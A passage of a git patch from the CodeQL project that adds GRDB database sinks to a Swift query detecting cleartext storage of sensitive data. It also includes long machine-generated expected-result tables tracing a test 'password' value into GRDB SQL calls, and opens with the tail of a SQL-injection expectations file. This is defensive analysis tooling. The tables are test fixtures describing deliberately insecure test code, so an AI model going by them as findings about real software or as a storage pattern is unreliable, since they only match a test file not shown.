SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) : | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | From 4215a89bc84a04ac341fea00b9c322e188980b42 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Fri, 23 Dec 2022 17:03:40 +0100 Subject: [PATCH 074/381] Add cleartext storage database sinks --- .../CWE-311/CleartextStorageDatabase.ql | 63 ++++++ .../CWE-311/CleartextStorageDatabase.expected | 204 +++++++++++++++++ .../Security/CWE-311/SensitiveExprs.expected | 51 +++++ .../Security/CWE-311/testGRDB.swift | 214 ++++++++++++++++++ 4 files changed, 532 insertions(+) create mode 100644 swift/ql/test/query-tests/Security/CWE-311/testGRDB.swift diff --git a/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql b/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql index e858e6dd357..d057d867326 100644 --- a/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql +++ b/swift/ql/src/queries/Security/CWE-311/CleartextStorageDatabase.ql @@ -56,6 +56,61 @@ class RealmStore extends Stored instanceof DataFlow::PostUpdateNode { } } +/** + * A `DataFlow::Node` that is an expression stored with the GRDB library. + */ +class GrdbStore extends Stored { + GrdbStore() { + exists(CallExpr call, MethodDecl method | + call.getStaticTarget() = method and + call.getArgumentWithLabel("arguments").getExpr() = this.asExpr() + | + method + .hasQualifiedName("Database", + ["allStatements(sql:arguments:)", "execute(sql:arguments:)",]) + or + method.hasQualifiedName("SQLRequest", "init(sql:arguments:adapter:cached:)") + or + method.hasQualifiedName("SQL", ["init(sql:arguments:)", "append(sql:arguments:)"]) + or + method.hasQualifiedName("SQLStatementCursor", "init(database:sql:arguments:prepFlags:)") + or + method + .hasQualifiedName("TableRecord", + [ + "select(sql:arguments:)", "select(sql:arguments:as:)", "filter(sql:arguments:)", + "order(sql:arguments:)" + ]) + or + method + .hasQualifiedName(["Row", "DatabaseValueConvertible", "FetchableRecord"], + [ + "fetchCursor(_:sql:arguments:adapter:)", "fetchAll(_:sql:arguments:adapter:)", + "fetchSet(_:sql:arguments:adapter:)", "fetchOne(_:sql:arguments:adapter:)" + ]) + or + method + .hasQualifiedName("FetchableRecord", + [ + "fetchCursor(_:arguments:adapter:)", "fetchAll(_:arguments:adapter:)", + "fetchSet(_:arguments:adapter:)", "fetchOne(_:arguments:adapter:)", + ]) + or + method.hasQualifiedName("Statement", ["execute(arguments:)"]) + or + method + .hasQualifiedName("CommonTableExpression", "init(recursive:named:columns:sql:arguments:)") + ) + or + exists(CallExpr call, MethodDecl method | + call.getStaticTarget() = method and + call.getArgument(0).getExpr() = this.asExpr() + | + method.hasQualifiedName("Statement", "setArguments(_:)") + ) + } +} + /** * A taint configuration from sensitive information to expressions that are * transmitted over a network. @@ -77,6 +132,14 @@ class CleartextStorageConfig extends TaintTracking::Configuration { node.asExpr() instanceof EncryptedExpr } + override predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) { + // Needed until we have proper content flow through arrays + exists(ArrayExpr arr | + node1.asExpr() = arr.getAnElement() and + node2.asExpr() = arr + ) + } + override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) { // flow out from fields of a `RealmSwiftObject` at the sink, for example in // `realmObj.data = sensitive`. diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected index fa0af25eec9..cf81ede25fa 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected +++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.expected @@ -9,6 +9,57 @@ edges | testCoreData.swift:91:10:91:10 | passwd : | testCoreData.swift:95:15:95:15 | x | | testCoreData.swift:92:10:92:10 | passwd : | testCoreData.swift:96:15:96:15 | y | | testCoreData.swift:93:10:93:10 | passwd : | testCoreData.swift:97:15:97:15 | z | +| testGRDB.swift:73:57:73:57 | password : | testGRDB.swift:73:56:73:65 | [...] | +| testGRDB.swift:76:43:76:43 | password : | testGRDB.swift:76:42:76:51 | [...] | +| testGRDB.swift:81:45:81:45 | password : | testGRDB.swift:81:44:81:53 | [...] | +| testGRDB.swift:83:45:83:45 | password : | testGRDB.swift:83:44:83:53 | [...] | +| testGRDB.swift:85:45:85:45 | password : | testGRDB.swift:85:44:85:53 | [...] | +| testGRDB.swift:87:45:87:45 | password : | testGRDB.swift:87:44:87:53 | [...] | +| testGRDB.swift:92:38:92:38 | password : | testGRDB.swift:92:37:92:46 | [...] | +| testGRDB.swift:95:37:95:37 | password : | testGRDB.swift:95:36:95:45 | [...] | +| testGRDB.swift:100:73:100:73 | password : | testGRDB.swift:100:72:100:81 | [...] | +| testGRDB.swift:101:73:101:73 | password : | testGRDB.swift:101:72:101:81 | [...] | +| testGRDB.swift:107:53:107:53 | password : | testGRDB.swift:107:52:107:61 | [...] | +| testGRDB.swift:109:53:109:53 | password : | testGRDB.swift:109:52:109:61 | [...] | +| testGRDB.swift:111:52:111:52 | password : | testGRDB.swift:111:51:111:60 | [...] | +| testGRDB.swift:116:48:116:48 | password : | testGRDB.swift:116:47:116:56 | [...] | +| testGRDB.swift:118:48:118:48 | password : | testGRDB.swift:118:47:118:56 | [...] | +| testGRDB.swift:121:45:121:45 | password : | testGRDB.swift:121:44:121:53 | [...] | +| testGRDB.swift:123:45:123:45 | password : | testGRDB.swift:123:44:123:53 | [...] | +| testGRDB.swift:126:45:126:45 | password : | testGRDB.swift:126:44:126:53 | [...] | +| testGRDB.swift:128:45:128:45 | password : | testGRDB.swift:128:44:128:53 | [...] | +| testGRDB.swift:131:45:131:45 | password : | testGRDB.swift:131:44:131:53 | [...] | +| testGRDB.swift:133:45:133:45 | password : | testGRDB.swift:133:44:133:53 | [...] | +| testGRDB.swift:138:69:138:69 | password : | testGRDB.swift:138:68:138:77 | [...] | +| testGRDB.swift:140:69:140:69 | password : | testGRDB.swift:140:68:140:77 | [...] | +| testGRDB.swift:143:66:143:66 | password : | testGRDB.swift:143:65:143:74 | [...] | +| testGRDB.swift:145:66:145:66 | password : | testGRDB.swift:145:65:145:74 | [...] | +| testGRDB.swift:148:66:148:66 | password : | testGRDB.swift:148:65:148:74 | [...] | +| testGRDB.swift:150:66:150:66 | password : | testGRDB.swift:150:65:150:74 | [...] | +| testGRDB.swift:153:66:153:66 | password : | testGRDB.swift:153:65:153:74 | [...] | +| testGRDB.swift:155:66:155:66 | password : | testGRDB.swift:155:65:155:74 | [...] | +| testGRDB.swift:160:60:160:60 | password : | testGRDB.swift:160:59:160:68 | [...] | +| testGRDB.swift:161:51:161:51 | password : | testGRDB.swift:161:50:161:59 | [...] | +| testGRDB.swift:164:60:164:60 | password : | testGRDB.swift:164:59:164:68 | [...] | +| testGRDB.swift:165:51:165:51 | password : | testGRDB.swift:165:50:165:59 | [...] | +| testGRDB.swift:169:57:169:57 | password : | testGRDB.swift:169:56:169:65 | [...] | +| testGRDB.swift:170:48:170:48 | password : | testGRDB.swift:170:47:170:56 | [...] | +| testGRDB.swift:173:57:173:57 | password : | testGRDB.swift:173:56:173:65 | [...] | +| testGRDB.swift:174:48:174:48 | password : | testGRDB.swift:174:47:174:56 | [...] | +| testGRDB.swift:178:57:178:57 | password : | testGRDB.swift:178:56:178:65 | [...] | +| testGRDB.swift:179:48:179:48 | password : | testGRDB.swift:179:47:179:56 | [...] | +| testGRDB.swift:182:57:182:57 | password : | testGRDB.swift:182:56:182:65 | [...] | +| testGRDB.swift:183:48:183:48 | password : | testGRDB.swift:183:47:183:56 | [...] | +| testGRDB.swift:187:57:187:57 | password : | testGRDB.swift:187:56:187:65 | [...] | +| testGRDB.swift:188:48:188:48 | password : | testGRDB.swift:188:47:188:56 | [...] | +| testGRDB.swift:191:57:191:57 | password : | testGRDB.swift:191:56:191:65 | [...] | +| testGRDB.swift:192:48:192:48 | password : | testGRDB.swift:192:47:192:56 | [...] | +| testGRDB.swift:198:30:198:30 | password : | testGRDB.swift:198:29:198:38 | [...] | +| testGRDB.swift:201:24:201:24 | password : | testGRDB.swift:201:23:201:32 | [...] | +| testGRDB.swift:206:67:206:67 | password : | testGRDB.swift:206:66:206:75 | [...] | +| testGRDB.swift:208:81:208:81 | password : | testGRDB.swift:208:80:208:89 | [...] | +| testGRDB.swift:210:85:210:85 | password : | testGRDB.swift:210:84:210:93 | [...] | +| testGRDB.swift:212:99:212:99 | password : | testGRDB.swift:212:98:212:107 | [...] | | testRealm.swift:16:6:16:6 | value : | file://:0:0:0:0 | value : | | testRealm.swift:34:2:34:2 | [post] a [data] : | testRealm.swift:34:2:34:2 | [post] a | | testRealm.swift:34:11:34:11 | myPassword : | testRealm.swift:16:6:16:6 | value : | @@ -45,6 +96,108 @@ nodes | testCoreData.swift:95:15:95:15 | x | semmle.label | x | | testCoreData.swift:96:15:96:15 | y | semmle.label | y | | testCoreData.swift:97:15:97:15 | z | semmle.label | z | +| testGRDB.swift:73:56:73:65 | [...] | semmle.label | [...] | +| testGRDB.swift:73:57:73:57 | password : | semmle.label | password : | +| testGRDB.swift:76:42:76:51 | [...] | semmle.label | [...] | +| testGRDB.swift:76:43:76:43 | password : | semmle.label | password : | +| testGRDB.swift:81:44:81:53 | [...] | semmle.label | [...] | +| testGRDB.swift:81:45:81:45 | password : | semmle.label | password : | +| testGRDB.swift:83:44:83:53 | [...] | semmle.label | [...] | +| testGRDB.swift:83:45:83:45 | password : | semmle.label | password : | +| testGRDB.swift:85:44:85:53 | [...] | semmle.label | [...] | +| testGRDB.swift:85:45:85:45 | password : | semmle.label | password : | +| testGRDB.swift:87:44:87:53 | [...] | semmle.label | [...] | +| testGRDB.swift:87:45:87:45 | password : | semmle.label | password : | +| testGRDB.swift:92:37:92:46 | [...] | semmle.label | [...] | +| testGRDB.swift:92:38:92:38 | password : | semmle.label | password : | +| testGRDB.swift:95:36:95:45 | [...] | semmle.label | [...] | +| testGRDB.swift:95:37:95:37 | password : | semmle.label | password : | +| testGRDB.swift:100:72:100:81 | [...] | semmle.label | [...] | +| testGRDB.swift:100:73:100:73 | password : | semmle.label | password : | +| testGRDB.swift:101:72:101:81 | [...] | semmle.label | [...] | +| testGRDB.swift:101:73:101:73 | password : | semmle.label | password : | +| testGRDB.swift:107:52:107:61 | [...] | semmle.label | [...] | +| testGRDB.swift:107:53:107:53 | password : | semmle.label | password : | +| testGRDB.swift:109:52:109:61 | [...] | semmle.label | [...] | +| testGRDB.swift:109:53:109:53 | password : | semmle.label | password : | +| testGRDB.swift:111:51:111:60 | [...] | semmle.label | [...] | +| testGRDB.swift:111:52:111:52 | password : | semmle.label | password : | +| testGRDB.swift:116:47:116:56 | [...] | semmle.label | [...] | +| testGRDB.swift:116:48:116:48 | password : | semmle.label | password : | +| testGRDB.swift:118:47:118:56 | [...] | semmle.label | [...] | +| testGRDB.swift:118:48:118:48 | password : | semmle.label | password : | +| testGRDB.swift:121:44:121:53 | [...] | semmle.label | [...] | +| testGRDB.swift:121:45:121:45 | password : | semmle.label | password : | +| testGRDB.swift:123:44:123:53 | [...] | semmle.label | [...] | +| testGRDB.swift:123:45:123:45 | password : | semmle.label | password : | +| testGRDB.swift:126:44:126:53 | [...] | semmle.label | [...] | +| testGRDB.swift:126:45:126:45 | password : | semmle.label | password : | +| testGRDB.swift:128:44:128:53 | [...] | semmle.label | [...] | +| testGRDB.swift:128:45:128:45 | password : | semmle.label | password : | +| testGRDB.swift:131:44:131:53 | [...] | semmle.label | [...] | +| testGRDB.swift:131:45:131:45 | password : | semmle.label | password : | +| testGRDB.swift:133:44:133:53 | [...] | semmle.label | [...] | +| testGRDB.swift:133:45:133:45 | password : | semmle.label | password : | +| testGRDB.swift:138:68:138:77 | [...] | semmle.label | [...] | +| testGRDB.swift:138:69:138:69 | password : | semmle.label | password : | +| testGRDB.swift:140:68:140:77 | [...] | semmle.label | [...] | +| testGRDB.swift:140:69:140:69 | password : | semmle.label | password : | +| testGRDB.swift:143:65:143:74 | [...] | semmle.label | [...] | +| testGRDB.swift:143:66:143:66 | password : | semmle.label | password : | +| testGRDB.swift:145:65:145:74 | [...] | semmle.label | [...] | +| testGRDB.swift:145:66:145:66 | password : | semmle.label | password : | +| testGRDB.swift:148:65:148:74 | [...] | semmle.label | [...] | +| testGRDB.swift:148:66:148:66 | password : | semmle.label | password : | +| testGRDB.swift:150:65:150:74 | [...] | semmle.label | [...] | +| testGRDB.swift:150:66:150:66 | password : | semmle.label | password : | +| testGRDB.swift:153:65:153:74 | [...] | semmle.label | [...] | +| testGRDB.swift:153:66:153:66 | password : | semmle.label | password : | +| testGRDB.swift:155:65:155:74 | [...] | semmle.label | [...] | +| testGRDB.swift:155:66:155:66 | password : | semmle.label | password : | +| testGRDB.swift:160:59:160:68 | [...] | semmle.label | [...] | +| testGRDB.swift:160:60:160:60 | password : | semmle.label | password : | +| testGRDB.swift:161:50:161:59 | [...] | semmle.label | [...] | +| testGRDB.swift:161:51:161:51 | password : | semmle.label | password : | +| testGRDB.swift:164:59:164:68 | [...] | semmle.label | [...] | +| testGRDB.swift:164:60:164:60 | password : | semmle.label | password : | +| testGRDB.swift:165:50:165:59 | [...] | semmle.label | [...] | +| testGRDB.swift:165:51:165:51 | password : | semmle.label | password : | +| testGRDB.swift:169:56:169:65 | [...] | semmle.label | [...] | +| testGRDB.swift:169:57:169:57 | password : | semmle.label | password : | +| testGRDB.swift:170:47:170:56 | [...] | semmle.label | [...] | +| testGRDB.swift:170:48:170:48 | password : | semmle.label | password : | +| testGRDB.swift:173:56:173:65 | [...] | semmle.label | [...] | +| testGRDB.swift:173:57:173:57 | password : | semmle.label | password : | +| testGRDB.swift:174:47:174:56 | [...] | semmle.label | [...] | +| testGRDB.swift:174:48:174:48 | password : | semmle.label | password : | +| testGRDB.swift:178:56:178:65 | [...] | semmle.label | [...] | +| testGRDB.swift:178:57:178:57 | password : | semmle.label | password : | +| testGRDB.swift:179:47:179:56 | [...] | semmle.label | [...] | +| testGRDB.swift:179:48:179:48 | password : | semmle.label | password : | +| testGRDB.swift:182:56:182:65 | [...] | semmle.label | [...] | +| testGRDB.swift:182:57:182:57 | password : | semmle.label | password : | +| testGRDB.swift:183:47:183:56 | [...] | semmle.label | [...] | +| testGRDB.swift:183:48:183:48 | password : | semmle.label | password : | +| testGRDB.swift:187:56:187:65 | [...] | semmle.label | [...] | +| testGRDB.swift:187:57:187:57 | password : | semmle.label | password : | +| testGRDB.swift:188:47:188:56 | [...] | semmle.label | [...] | +| testGRDB.swift:188:48:188:48 | password : | semmle.label | password : | +| testGRDB.swift:191:56:191:65 | [...] | semmle.label | [...] | +| testGRDB.swift:191:57:191:57 | password : | semmle.label | password : | +| testGRDB.swift:192:47:192:56 | [...] | semmle.label | [...] | +| testGRDB.swift:192:48:192:48 | password : | semmle.label | password : | +| testGRDB.swift:198:29:198:38 | [...] | semmle.label | [...] | +| testGRDB.swift:198:30:198:30 | password : | semmle.label | password : | +| testGRDB.swift:201:23:201:32 | [...] | semmle.label | [...] | +| testGRDB.swift:201:24:201:24 | password : | semmle.label | password : | +| testGRDB.swift:206:66:206:75 | [...] | semmle.label | [...] | +| testGRDB.swift:206:67:206:67 | password : | semmle.label | password : | +| testGRDB.swift:208:80:208:89 | [...] | semmle.label | [...] | +| testGRDB.swift:208:81:208:81 | password : | semmle.label | password : | +| testGRDB.swift:210:84:210:93 | [...] | semmle.label | [...] | +| testGRDB.swift:210:85:210:85 | password : | semmle.label | password : | +| testGRDB.swift:212:98:212:107 | [...] | semmle.label | [...] | +| testGRDB.swift:212:99:212:99 | password : | semmle.label | password : | | testRealm.swift:16:6:16:6 | value : | semmle.label | value : | | testRealm.swift:34:2:34:2 | [post] a | semmle.label | [post] a | | testRealm.swift:34:2:34:2 | [post] a [data] : | semmle.label | [post] a [data] : | @@ -75,6 +228,57 @@ subpaths | testCoreData.swift:95:15:95:15 | x | testCoreData.swift:91:10:91:10 | passwd : | testCoreData.swift:95:15:95:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:91:10:91:10 | passwd : | passwd | | testCoreData.swift:96:15:96:15 | y | testCoreData.swift:92:10:92:10 | passwd : | testCoreData.swift:96:15:96:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:92:10:92:10 | passwd : | passwd | | testCoreData.swift:97:15:97:15 | z | testCoreData.swift:93:10:93:10 | passwd : | testCoreData.swift:97:15:97:15 | z | This operation stores 'z' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:93:10:93:10 | passwd : | passwd | +| testGRDB.swift:73:56:73:65 | [...] | testGRDB.swift:73:57:73:57 | password : | testGRDB.swift:73:56:73:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:73:57:73:57 | password : | password | +| testGRDB.swift:76:42:76:51 | [...] | testGRDB.swift:76:43:76:43 | password : | testGRDB.swift:76:42:76:51 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:76:43:76:43 | password : | password | +| testGRDB.swift:81:44:81:53 | [...] | testGRDB.swift:81:45:81:45 | password : | testGRDB.swift:81:44:81:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:81:45:81:45 | password : | password | +| testGRDB.swift:83:44:83:53 | [...] | testGRDB.swift:83:45:83:45 | password : | testGRDB.swift:83:44:83:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:83:45:83:45 | password : | password | +| testGRDB.swift:85:44:85:53 | [...] | testGRDB.swift:85:45:85:45 | password : | testGRDB.swift:85:44:85:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:85:45:85:45 | password : | password | +| testGRDB.swift:87:44:87:53 | [...] | testGRDB.swift:87:45:87:45 | password : | testGRDB.swift:87:44:87:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:87:45:87:45 | password : | password | +| testGRDB.swift:92:37:92:46 | [...] | testGRDB.swift:92:38:92:38 | password : | testGRDB.swift:92:37:92:46 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:92:38:92:38 | password : | password | +| testGRDB.swift:95:36:95:45 | [...] | testGRDB.swift:95:37:95:37 | password : | testGRDB.swift:95:36:95:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:95:37:95:37 | password : | password | +| testGRDB.swift:100:72:100:81 | [...] | testGRDB.swift:100:73:100:73 | password : | testGRDB.swift:100:72:100:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:100:73:100:73 | password : | password | +| testGRDB.swift:101:72:101:81 | [...] | testGRDB.swift:101:73:101:73 | password : | testGRDB.swift:101:72:101:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:101:73:101:73 | password : | password | +| testGRDB.swift:107:52:107:61 | [...] | testGRDB.swift:107:53:107:53 | password : | testGRDB.swift:107:52:107:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:107:53:107:53 | password : | password | +| testGRDB.swift:109:52:109:61 | [...] | testGRDB.swift:109:53:109:53 | password : | testGRDB.swift:109:52:109:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:109:53:109:53 | password : | password | +| testGRDB.swift:111:51:111:60 | [...] | testGRDB.swift:111:52:111:52 | password : | testGRDB.swift:111:51:111:60 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:111:52:111:52 | password : | password | +| testGRDB.swift:116:47:116:56 | [...] | testGRDB.swift:116:48:116:48 | password : | testGRDB.swift:116:47:116:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:116:48:116:48 | password : | password | +| testGRDB.swift:118:47:118:56 | [...] | testGRDB.swift:118:48:118:48 | password : | testGRDB.swift:118:47:118:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:118:48:118:48 | password : | password | +| testGRDB.swift:121:44:121:53 | [...] | testGRDB.swift:121:45:121:45 | password : | testGRDB.swift:121:44:121:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:121:45:121:45 | password : | password | +| testGRDB.swift:123:44:123:53 | [...] | testGRDB.swift:123:45:123:45 | password : | testGRDB.swift:123:44:123:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:123:45:123:45 | password : | password | +| testGRDB.swift:126:44:126:53 | [...] | testGRDB.swift:126:45:126:45 | password : | testGRDB.swift:126:44:126:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:126:45:126:45 | password : | password | +| testGRDB.swift:128:44:128:53 | [...] | testGRDB.swift:128:45:128:45 | password : | testGRDB.swift:128:44:128:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:128:45:128:45 | password : | password | +| testGRDB.swift:131:44:131:53 | [...] | testGRDB.swift:131:45:131:45 | password : | testGRDB.swift:131:44:131:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:131:45:131:45 | password : | password | +| testGRDB.swift:133:44:133:53 | [...] | testGRDB.swift:133:45:133:45 | password : | testGRDB.swift:133:44:133:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:133:45:133:45 | password : | password | +| testGRDB.swift:138:68:138:77 | [...] | testGRDB.swift:138:69:138:69 | password : | testGRDB.swift:138:68:138:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:138:69:138:69 | password : | password | +| testGRDB.swift:140:68:140:77 | [...] | testGRDB.swift:140:69:140:69 | password : | testGRDB.swift:140:68:140:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:140:69:140:69 | password : | password | +| testGRDB.swift:143:65:143:74 | [...] | testGRDB.swift:143:66:143:66 | password : | testGRDB.swift:143:65:143:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:143:66:143:66 | password : | password | +| testGRDB.swift:145:65:145:74 | [...] | testGRDB.swift:145:66:145:66 | password : | testGRDB.swift:145:65:145:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:145:66:145:66 | password : | password | +| testGRDB.swift:148:65:148:74 | [...] | testGRDB.swift:148:66:148:66 | password : | testGRDB.swift:148:65:148:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:148:66:148:66 | password : | password | +| testGRDB.swift:150:65:150:74 | [...] | testGRDB.swift:150:66:150:66 | password : | testGRDB.swift:150:65:150:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:150:66:150:66 | password : | password | +| testGRDB.swift:153:65:153:74 | [...] | testGRDB.swift:153:66:153:66 | password : | testGRDB.swift:153:65:153:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:153:66:153:66 | password : | password | +| testGRDB.swift:155:65:155:74 | [...] | testGRDB.swift:155:66:155:66 | password : | testGRDB.swift:155:65:155:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:155:66:155:66 | password : | password | +| testGRDB.swift:160:59:160:68 | [...] | testGRDB.swift:160:60:160:60 | password : | testGRDB.swift:160:59:160:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:160:60:160:60 | password : | password | +| testGRDB.swift:161:50:161:59 | [...] | testGRDB.swift:161:51:161:51 | password : | testGRDB.swift:161:50:161:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:161:51:161:51 | password : | password | +| testGRDB.swift:164:59:164:68 | [...] | testGRDB.swift:164:60:164:60 | password : | testGRDB.swift:164:59:164:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:164:60:164:60 | password : | password | +| testGRDB.swift:165:50:165:59 | [...] | testGRDB.swift:165:51:165:51 | password : | testGRDB.swift:165:50:165:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:165:51:165:51 | password : | password | +| testGRDB.swift:169:56:169:65 | [...] | testGRDB.swift:169:57:169:57 | password : | testGRDB.swift:169:56:169:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:169:57:169:57 | password : | password | +| testGRDB.swift:170:47:170:56 | [...] | testGRDB.swift:170:48:170:48 | password : | testGRDB.swift:170:47:170:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:170:48:170:48 | password : | password | +| testGRDB.swift:173:56:173:65 | [...] | testGRDB.swift:173:57:173:57 | password : | testGRDB.swift:173:56:173:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:173:57:173:57 | password : | password | +| testGRDB.swift:174:47:174:56 | [...] | testGRDB.swift:174:48:174:48 | password : | testGRDB.swift:174:47:174:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:174:48:174:48 | password : | password | +| testGRDB.swift:178:56:178:65 | [...] | testGRDB.swift:178:57:178:57 | password : | testGRDB.swift:178:56:178:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:178:57:178:57 | password : | password | +| testGRDB.swift:179:47:179:56 | [...] | testGRDB.swift:179:48:179:48 | password : | testGRDB.swift:179:47:179:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:179:48:179:48 | password : | password | +| testGRDB.swift:182:56:182:65 | [...] | testGRDB.swift:182:57:182:57 | password : | testGRDB.swift:182:56:182:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:182:57:182:57 | password : | password | +| testGRDB.swift:183:47:183:56 | [...] | testGRDB.swift:183:48:183:48 | password : | testGRDB.swift:183:47:183:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:183:48:183:48 | password : | password | +| testGRDB.swift:187:56:187:65 | [...] | testGRDB.swift:187:57:187:57 | password : | testGRDB.swift:187:56:187:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:187:57:187:57 | password : | password | +| testGRDB.swift:188:47:188:56 | [...] | testGRDB.swift:188:48:188:48 | password : | testGRDB.swift:188:47:188:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:188:48:188:48 | password : | password | +| testGRDB.swift:191:56:191:65 | [...] | testGRDB.swift:191:57:191:57 | password : | testGRDB.swift:191:56:191:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:191:57:191:57 | password : | password | +| testGRDB.swift:192:47:192:56 | [...] | testGRDB.swift:192:48:192:48 | password : | testGRDB.swift:192:47:192:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:192:48:192:48 | password : | password | +| testGRDB.swift:198:29:198:38 | [...] | testGRDB.swift:198:30:198:30 | password : | testGRDB.swift:198:29:198:38 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:198:30:198:30 | password : | password | +| testGRDB.swift:201:23:201:32 | [...] | testGRDB.swift:201:24:201:24 | password : | testGRDB.swift:201:23:201:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:201:24:201:24 | password : | password | +| testGRDB.swift:206:66:206:75 | [...] | testGRDB.swift:206:67:206:67 | password : | testGRDB.swift:206:66:206:75 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:206:67:206:67 | password : | password | +| testGRDB.swift:208:80:208:89 | [...] | testGRDB.swift:208:81:208:81 | password : | testGRDB.swift:208:80:208:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:208:81:208:81 | password : | password | +| testGRDB.swift:210:84:210:93 | [...] | testGRDB.swift:210:85:210:85 | password : | testGRDB.swift:210:84:210:93 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:210:85:210:85 | password : | password | +| testGRDB.swift:212:98:212:107 | [...] | testGRDB.swift:212:99:212:99 | password : | testGRDB.swift:212:98:212:107 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:212:99:212:99 | password : | password | | testRealm.swift:34:2:34:2 | a | testRealm.swift:34:11:34:11 | myPassword : | testRealm.swift:34:2:34:2 | [post] a | 